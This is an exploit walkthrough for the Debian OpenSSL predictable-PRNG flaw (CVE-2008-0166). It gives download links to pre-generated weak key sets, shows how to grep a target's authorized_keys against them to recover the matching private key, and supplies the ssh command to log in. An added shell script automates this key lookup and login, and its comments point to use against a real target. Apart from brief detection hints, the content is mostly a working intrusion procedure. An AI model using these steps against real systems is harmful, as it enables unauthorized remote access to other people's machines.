Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
https://osandamalith.com/2013/11/16/rooting-pwnos/
https://www.exploit-db.com/exploits/5632
https://github.com/g0tmi1k/debian-ssh
On the target host, the indicators are the openssh-blacklist files under /etc/ssh (blacklist.RSA-2048, blacklist.DSA-1024 and similar), an installed OpenSSL in the affected version range (check with dpkg -l openssl or openssl version), and SSH keys generated while that version was installed. Where the ssh-vulnkey tool is present (Debian/Ubuntu of that era), ssh-vulnkey -a reports every blacklisted key on the system.
The weakness is CVE-2008-0166: Debian's patched OpenSSL seeded its PRNG with essentially only the process ID, so for a given key type, size and architecture there are just 32,768 possible keys (one per PID). The whole keyspace can be generated in advance, and the private key behind a weak public key is found by lookup rather than by breaking the cryptography.
In this scenario we have obtained the authorized_keys file from the target machine. It contains public keys only; we want the private key that matches one of them.
The pre-generated key sets are split by key type, so first read the type from the authorized_keys entry: each line starts with it (ssh-rsa or ssh-dss), possibly after options such as from= or command=.
For dsa - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5632.tar.bz2
For ssh-rsa - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
After extracting the tarball, change into the resulting directory. Copy a distinctive portion of the base64 key blob from the authorized_keys line and grep for it across the .pub files; the file that matches is the weak public key, and the private key sits next to it under the same name without the .pub suffix.
```sh
$ grep -rl PUBLIC_KEY_PART *.pub
00005b35764e0b2401a9dcbca5b6b6b5-1390.pub

# The private key is the matching file without .pub; ssh refuses keys readable by others.
chmod 600 00005b35764e0b2401a9dcbca5b6b6b5-1390

# For dsa. The old server only offers legacy algorithms, so a modern client must re-enable them.
# OpenSSH 8.5+ spells the option PubkeyAcceptedAlgorithms, and 9.8+ disables ssh-dss by default,
# so an older client may be needed. For an ssh-rsa key use +ssh-rsa instead of +ssh-dss.
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-dss -i 00005b35764e0b2401a9dcbca5b6b6b5-1390 -o PasswordAuthentication=no test@192.168.1.2
```
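The whole procedure above (read the key type from each authorized_keys entry, search the pre-generated set for the public key, hand back the matching private key and the ssh command for it), as an added shell example that is not part of the original page or of the 5622/5632 exploit packages. It assumes the extracted tarball directory holds name / name.pub pairs as described above; the filenames and key blobs produced by make_demo_data are constructed placeholders, not real weak keys.

```shell
#!/bin/sh
# Added example, not code from the page or from the 5622/5632 exploit packages.
# Given a target's authorized_keys and a directory holding a pre-generated weak
# key set (pairs of <name> / <name>.pub as shipped in those tarballs), report
# every authorized key that is in the weak set and the private key that opens it.

# find_weak_keys AUTHORIZED_KEYS KEYDIR
# Prints "<type> <path-to-private-key>" for each hit.
find_weak_keys() {
    auth="$1"; keydir="$2"
    # authorized_keys syntax: [options] <type> <base64 blob> [comment]
    grep -v '^[[:space:]]*#' "$auth" | grep -v '^[[:space:]]*$' | while IFS= read -r line; do
        set -f            # no globbing while the line is split into words
        set -- $line
        set +f
        # skip leading options (from=, command=, ...) until the key type token
        while [ $# -gt 2 ]; do
            case "$1" in
                ssh-rsa|ssh-dss) break ;;
                *) shift ;;
            esac
        done
        case "$1" in ssh-rsa|ssh-dss) ;; *) continue ;; esac
        type="$1"; blob="$2"
        # The base64 blob is unique per key: a fixed-string grep over the .pub
        # files finds the matching pre-generated public key, if any. find+exec
        # avoids a 32k-file glob on the command line.
        pub=$(find "$keydir" -name '*.pub' -exec grep -lF -- "$blob" {} + | head -n 1)
        [ -n "$pub" ] || continue
        printf '%s %s\n' "$type" "${pub%.pub}"
    done
}

# ssh_cmd TYPE PRIVKEY USER HOST
# Prints the ssh invocation for a recovered key. The vulnerable servers only
# speak legacy algorithms, so a modern client must re-enable them; OpenSSH 8.5+
# spells the option PubkeyAcceptedAlgorithms, and 9.8+ disables ssh-dss by
# default, so an older client may be needed for DSA keys.
ssh_cmd() {
    type="$1"; key="$2"; user="$3"; host="$4"
    case "$type" in
        ssh-dss) alg='-oPubkeyAcceptedKeyTypes=+ssh-dss' ;;
        ssh-rsa) alg='-oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa' ;;
        *) return 1 ;;
    esac
    printf 'ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s -o PasswordAuthentication=no -i %s %s@%s\n' \
        "$alg" "$key" "$user" "$host"
}

# make_demo_data DIR
# Constructed sample (no real key material): two placeholder "weak" key pairs
# and an authorized_keys file holding one weak DSA key and one unrelated RSA key.
make_demo_data() {
    mkdir -p "$1/keys"
    printf 'ssh-dss AAAAB3NzaC1kc3MAAACBAPLACEHOLDERWEAKDSA1 root@gen\n' > "$1/keys/00000000deadbeef-1390.pub"
    : > "$1/keys/00000000deadbeef-1390"
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAPLACEHOLDERWEAKRSA2 root@gen\n' > "$1/keys/00000000cafebabe-2048.pub"
    : > "$1/keys/00000000cafebabe-2048"
    cat > "$1/authorized_keys" <<'EOF'
# keys for the test account
ssh-dss AAAAB3NzaC1kc3MAAACBAPLACEHOLDERWEAKDSA1 test@target
from="10.0.0.0/8" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQNOTINWEAKSET ops@target
EOF
}

# Stand-alone run on the constructed data. Against a real target:
#   find_weak_keys ./authorized_keys ./debian_ssh_dsa_1024_x86
tmp=$(mktemp -d)
make_demo_data "$tmp"
find_weak_keys "$tmp/authorized_keys" "$tmp/keys" | while read -r type priv; do
    chmod 600 "$priv"
    ssh_cmd "$type" "$priv" test 192.168.1.2
done
rm -rf "$tmp"
```

Only the weak DSA entry is reported; the RSA entry is not in the pre-generated set and is ignored, which is exactly the signal you want when an authorized_keys file mixes old and newer keys.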